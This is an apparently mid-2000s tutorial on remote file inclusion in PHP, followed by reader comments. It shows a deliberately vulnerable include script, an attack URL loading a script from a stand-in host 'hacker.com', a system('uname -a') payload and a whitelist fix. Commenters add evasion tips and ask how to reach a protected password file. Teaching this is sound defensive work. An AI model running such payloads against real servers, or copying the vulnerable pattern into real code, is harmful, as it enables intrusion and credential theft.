Writing Secure PHP Applications
By Erik Wrenholt
PHP is a powerful scripting language for building web applications, and also one of the easiest ways for hackers to gain access to your web server. Developers need to understand how their scripts can be exploited in order to protect them.
One of the more popular attacks is the Cross-Site-Scripting technique. A hacker can exploit a poorly written PHP application by executing their PHP code on your web server.
The easiest way to demonstrate this vulnerability is to experiment with a PHP script with this problem. Place this script in your web server's document root. Don't forget to remove it when you are done with it!
hackme.php source
<a href="?page=home.php">Home</a> |
<a href="?page=about.php">About</a>
<?php
$page = $_GET['page'];
if ($page)
include $page;
else
echo "Please specify a page.";
?>
The programmer can simply add links to new PHP pages in the HTML as they add page to the website:
| <a href="?page=contact.php">Contact</a>
But an attacker can modify the URL and do the same thing!
http://www.site.com/hackme.php?page=http://www.hacker.com/evilscript.php
The hackme.php script will happily load the evilscript.php from the www.hacker.com web server, and execute it on your machine. You can try this example by placing the evilscript.php in the same directory as hackme.php and passing it's url to the hackme.php script:
http://127.0.0.1/hackme.php?page=http://127.0.0.1/evilscript.php
evilscript.php source
<?php
system ('uname -a');
?>
This example will execute the uname command on your computer, giving the attacker information about what operating system you are running. They can then modify their evilscript.php to download a local root exploit specific to your operating system, and gain full access to your web server.
Fixing the hackme.php script
Basically, you want to remove the line that says 'include $page;' because it allows the attacker to load a page from anywhere on the internet. Instead, include php scripts only if they are listed in the switch statement.
<a href="?page=home.php">Home</a> |
<a href="?page=about.php">About</a>
<?php
$page = $_GET['page'];
switch ($page) {
case "":
case "home.php":
include "home.php";
break;
case "about.php":
include "about.php";
break;
default:
echo "Invalid page";
break;
}
?>
Comments
|
More PHP Security Info
|
08/30/04
|
Jon
There's some good stuff at SecurePHP on writing secure code. It goes into a bit more depth.
|
|
|
Worse
|
08/31/04
|
Stathy Touloumis
This doesn't seem like an issue with insecure php "code" but rather php in general. Why the hell would php allow included code from a remote server without any type of security check?
Also, the sample above shouldn't work because the remote php code should be parsed on the hacker's server before sending the page to be included thereby executing the system call on the hackers system. Of course the hacker could explicitly allow the source to be sent.
If php implicitly bypasses the parsing of the page from the hackers server somehow (when an include is done) then this is another strike against php as this exploit could be easily used to retrieve source for any site running php.
Again, I'm not the expert on php but just a few points that I thought of while reading this article.
|
|
|
re: Worse
|
09/04/04
|
Erik Wrenholt
erik -at- timestretch.com
The example scenario would be more realistic if you renamed the evilscript.php to evilscript.txt. It would work just the same.
|
|
|
Remote Include
|
11/23/04
|
ALcard
alcard2020 -at- hotmail.com
$lines = file("http://www.whatever-site.com/directory/users.dat");
for ($i=0;$i
print "< p>< b>";
echo $lines[$i];
print "< /b>< p>------------------------------------------------------------< p>";
}
All logic speaking to me, this should print out the contents of the .dat page in my browser window. Since this is not a php file, it won't be parsed. The problem is, /directory has a .htaccess file that reads
"bla-bla
With apache, user will get 'internal sever error' in most cases (depend on your apache-settings)
So, nobody can see users-info (like password,mails e.t.c.)."
So how would one go about in bypassing this little obstacle?
|
|
|
file extension
|
03/03/05
|
|
It doesnt matter wha the file extension is on the hacker.com server. If the server isnt setup to parse php, then the source will be sent over. For example a hacker could host their evil php file at geocities.com because they dont parse php files.
|
|
|
Reply to Topic
|
08/30/07
|
Ahsan Riaz
me -at- you.com
Try to be more specific and try to address parcticals problems instead of metioning theories
|
|
Leave a Comment
 Show Comment Form
|
